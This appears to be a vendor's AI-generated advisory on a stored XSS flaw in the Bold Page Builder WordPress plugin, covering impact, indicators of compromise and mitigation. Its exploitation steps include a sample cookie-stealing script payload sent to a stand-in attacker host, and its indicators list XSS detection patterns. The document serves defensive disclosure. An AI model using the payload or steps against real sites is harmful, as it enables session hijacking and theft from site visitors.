CVE-2026-2357
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-2357 is a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin for WordPress, affecting all versions up to and including 5.6.8. The flaw exists in the plugin's bt_bb_shortcode shortcode handler due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on August 16, 2026, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-supplied shortcode attributes passed to bt_bb_shortcode are neither properly sanitized on input nor escaped on output before being rendered in page content. An authenticated attacker with contributor-level access or higher can craft a malicious shortcode containing arbitrary JavaScript and embed it in a WordPress page or post. Because the payload is stored server-side, it executes in the browser of any user who subsequently visits the affected page — no additional user interaction beyond page access is required. A patch commit is referenced in the WordPress plugin repository (GitHub Advisory, Plugin Changeset).

Impact

Successful exploitation allows an authenticated contributor (or higher-privileged user) to permanently inject malicious JavaScript into WordPress pages, which executes in the browsers of all site visitors. This can result in session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims (including administrators), and redirection to malicious external sites. While availability is not directly impacted, the confidentiality and integrity of user sessions and site content are at risk (GitHub Advisory, Wordfence).

Exploitability

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at the time of disclosure. The EPSS score is 0.0, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a contributor-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities (GitHub Advisory, Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Bold Page Builder plugin at version 5.6.8 or earlier (e.g., by checking plugin metadata via /wp-content/plugins/bold-page-builder/readme.txt or using web scanning tools).
  2. Obtain contributor access: Register or compromise a WordPress account with at least contributor-level privileges on the target site.
  3. Craft malicious shortcode: Create a page or post using the Bold Page Builder editor and insert a bt_bb_shortcode element with a malicious attribute containing a JavaScript payload, e.g., an attribute value such as "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Publish or submit content: Save or submit the page/post for publication. The malicious script is stored in the WordPress database without sanitization.
  5. Trigger execution: When any user (including administrators) visits the affected page, the injected script executes in their browser, enabling cookie theft, session hijacking, or further malicious actions (GitHub Advisory, Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or REST API endpoints containing bt_bb_shortcode with unusual attribute values including <script>, javascript:, or encoded variants (%3Cscript%3E).
  • Database: WordPress wp_posts or wp_postmeta tables containing bt_bb_shortcode entries with embedded <script> tags or event handler attributes (e.g., onerror, onload) in shortcode attribute values.
  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after visiting pages containing Bold Page Builder content, potentially indicating cookie exfiltration.
  • File System: No direct file system artifacts expected for stored XSS; however, review plugin files in wp-content/plugins/bold-page-builder/ for unauthorized modifications.
  • User Activity: Audit logs showing contributor or author accounts creating or editing pages with Bold Page Builder shortcodes containing suspicious attribute content (Wordfence).

Mitigation and workarounds

Update the Bold Page Builder plugin to a version newer than 5.6.8 as soon as a patched release is available; a fix commit has been submitted to the WordPress plugin repository (Plugin Changeset). As interim mitigations: restrict contributor and author roles to only fully trusted users; deploy a Web Application Firewall (WAF) configured to detect and block XSS payloads in shortcode parameters; and implement a strict Content Security Policy (CSP) header to limit inline script execution. Regularly audit page content for unexpected script injections and monitor user activity logs for unauthorized edits (Wordfence).

Community reactions

The vulnerability was reported and assigned by Wordfence, a leading WordPress security firm, and published to the GitHub Advisory Database on August 16, 2026. No notable independent researcher commentary, media coverage, or significant social media discussion beyond automated CVE tracking feeds has been observed at this time (GitHub Advisory, Wordfence).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-19848MEDIUM6.5
  • wp-user-avatar
NoYesAug 21, 2026
CVE-2026-17559MEDIUM5.3
  • content-protector
NoYesAug 21, 2026
CVE-2026-16650MEDIUM5.3
  • charitable
NoYesAug 21, 2026
CVE-2026-15150MEDIUM5.3
  • mycred
NoYesAug 21, 2026
CVE-2026-18356LOW3.7
  • limit-login-attempts-reloaded
NoYesAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management